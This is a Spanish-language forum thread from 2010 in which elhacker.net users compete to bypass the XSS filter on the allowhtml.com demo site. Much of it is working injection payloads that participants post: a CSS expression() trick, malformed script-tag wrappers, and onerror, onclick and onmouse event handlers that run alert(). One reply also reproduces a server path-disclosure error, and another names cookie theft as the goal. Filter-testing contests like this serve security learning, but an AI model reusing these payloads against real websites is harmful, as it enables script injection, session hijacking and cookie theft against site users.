|
Título: [CYH] Bypass de filtros de XSS :) Publicado por: sirdarckcat en 8 Abril 2010, 08:47 am Can You Hack? Semi-allowhtml CYH es un evento donde todos los usuarios del foro pueden participar y ganar premios y realizar todo tipo de retos :D Hola! Los invito a h4x0r3ar este filtro de XSS: http://allowhtml.com/demo/ Yo lo bypasee hace rato xD Código: <div style="xss=\000065xpression(confirm(1))!: url('xD');">hola</div> Asi que no esta muy dificil! Los 2 que encuentren mas bypasses antes del 8 de mayo, se ganan cuentas @elhacker.net Saludos!! Título: Re: Bypass de filtros de XSS :) Publicado por: tragantras en 8 Abril 2010, 13:50 pm alguien que sea generoso puede explicar la cadena que ha puesto sidarckcat
en concreto... el campo style de la etiqueta div gracias y un saludo :3 Título: Re: Bypass de filtros de XSS :) Publicado por: jdc en 8 Abril 2010, 17:38 pm Es parte de la celebración de abril negro?
No había puesto WHK el filtro de otra página? Título: Re: Bypass de filtros de XSS :) Publicado por: sirdarckcat en 8 Abril 2010, 22:11 pm el de WHK es PHPIDS
ese es otro y no tiene nada que ver con abril negro xD Título: Re: Bypass de filtros de XSS :) Publicado por: jdc en 8 Abril 2010, 22:15 pm ya no encontre nada y me dolio la cabeza, es muy extraño tu xss ¬¬ no lo entiendo o ya esta solucionado?
Código: <img widht="2000" height="2000" src="http://foro.elhacker.net/Smileys/chef/carita.gif" alt="juas" /> jajajajaja Título: Re: Bypass de filtros de XSS :) Publicado por: Shell Root en 8 Abril 2010, 22:23 pm Raro, porque?, Creo que es CSS Injection :P, Además si mal no recuerdo, expression es solo para IE! :silbar:
Código
Título: Re: Bypass de filtros de XSS :) Publicado por: yasión en 8 Abril 2010, 23:07 pm Esto hace cosas raras:
Código
Es lo primero que he probado, luego lo miro un poco más. Título: Re: Bypass de filtros de XSS :) Publicado por: SeC en 10 Abril 2010, 03:36 am Ya he probado de mil maneras =/ , esto se ve lindo, pero nada jeje, ta bueno el filtro =P
Código Título: Re: [CYH] Bypass de filtros de XSS :) Publicado por: cgvwzq en 14 Abril 2010, 20:36 pm Quiero una cuenta... =P
Código: <script>><img src=x onerror=alert(/cuack/) tr= Título: Re: [CYH] Bypass de filtros de XSS :) Publicado por: Shell Root en 14 Abril 2010, 20:41 pm jejejejeje ;-)
Título: Re: [CYH] Bypass de filtros de XSS :) Publicado por: SeC en 15 Abril 2010, 00:08 am Parece que aún vale, asique :P
Código: <STYLE TYPE="text/javascript">><a href="http://elhacker.net" onclick="alert(1)">XSS</a><</STYLE> otro, Código: <script>><a href="http://elhacker.net" onclick="alert(1)">XSS</a>< Título: Re: [CYH] Bypass de filtros de XSS :) Publicado por: ~ Yoya ~ en 15 Abril 2010, 01:56 am Código: <Script>><p onMouseDown=alert(0) >aa </p> t= Título: Re: [CYH] Bypass de filtros de XSS :) Publicado por: WHK en 15 Abril 2010, 06:03 am jajaja que chafa el filtro
Título: Re: [CYH] Bypass de filtros de XSS :) Publicado por: jdc en 15 Abril 2010, 06:20 am File disclosoure no vale?
Citar Warning: file_get_contents(/home/simoneme/allowhtml/main/files/antisamy.xml) [function.file-get-contents]: failed to open stream: No such file or directory in /home/simoneme/allowhtml/main/include/controllers/source_antisamy.php on line 7 Título: Re: [CYH] Bypass de filtros de XSS :) Publicado por: Castg! en 15 Abril 2010, 15:02 pm Phat disculosure :P
Título: Re: [CYH] Bypass de filtros de XSS :) Publicado por: netscape en 15 Abril 2010, 22:55 pm Aquí estan los mios:
Código: <script>>"/><a><<img src=lol.gif onerror=alert(1)> > Código: <script>>"/><a><<img src=lol.gif onerror=window.alert(1)> > Código: '>><marquee><h1>XSS</h1></marquee> Código: <script><TD><p onmousemove=alert('XSS') >lol </p><TABLE>Código: <script>><p lang="es"</p> onmouseup=alert('XSS')>>Código: <script>><q lang="he" dir="rtl"><p onmousedown=alert('XSS')</q></p>>Saludos!! Título: Re: [CYH] Bypass de filtros de XSS :) Publicado por: cgvwzq en 15 Abril 2010, 23:11 pm Pero si son todos el mismo...xD
Además, el último de netscape no es ni siquiera un bypass. ¬¬ A lo mucho se puede considerar el de SeC, que usa "style" en lugar de "script". Y da igual poner atributos, no afectan. Título: Re: [CYH] Bypass de filtros de XSS :) Publicado por: Castg! en 16 Abril 2010, 00:16 am El último de netscape qué tiene de inyección de javascript?
Título: Re: [CYH] Bypass de filtros de XSS :) Publicado por: jdc en 16 Abril 2010, 00:31 am Castg no necesitas inyectar javascript para que sea xss
Título: Re: [CYH] Bypass de filtros de XSS :) Publicado por: Castg! en 16 Abril 2010, 02:56 am ¬¬ pero este desafio es asi :D jajja, sino, xss en si es inyeccion HTML, y yapodemos inyectar html. lol.
la idea, es poder inyectar el codigo javascript para quitar una cookie. Título: Re: [CYH] Bypass de filtros de XSS :) Publicado por: jdc en 16 Abril 2010, 03:32 am pues ya se cumplieron los 2
xD Título: Re: [CYH] Bypass de filtros de XSS :) Publicado por: Castg! en 16 Abril 2010, 03:48 am >:( >:(
YA SE QUE ELPRIMERO SIRVE!! pero el segundo no! Título: Re: [CYH] Bypass de filtros de XSS :) Publicado por: jdc en 16 Abril 2010, 04:07 am Si te refieres al se SeC (<STYLE TYPE="text/javascript">><a href="http://elhacker.net" onclick="alert(1)">XSS</a><</STYLE>) si sirve, debes hacer click en el enlace que se genera :D
Título: Re: [CYH] Bypass de filtros de XSS :) Publicado por: Castg! en 16 Abril 2010, 04:11 am uy dios!, hay 3!
pero los dos primeros son iguales!, es como q ponga alert(1) y en otro alert(2), la inyeccion es la misma, pero el tercero, no es de javascript! |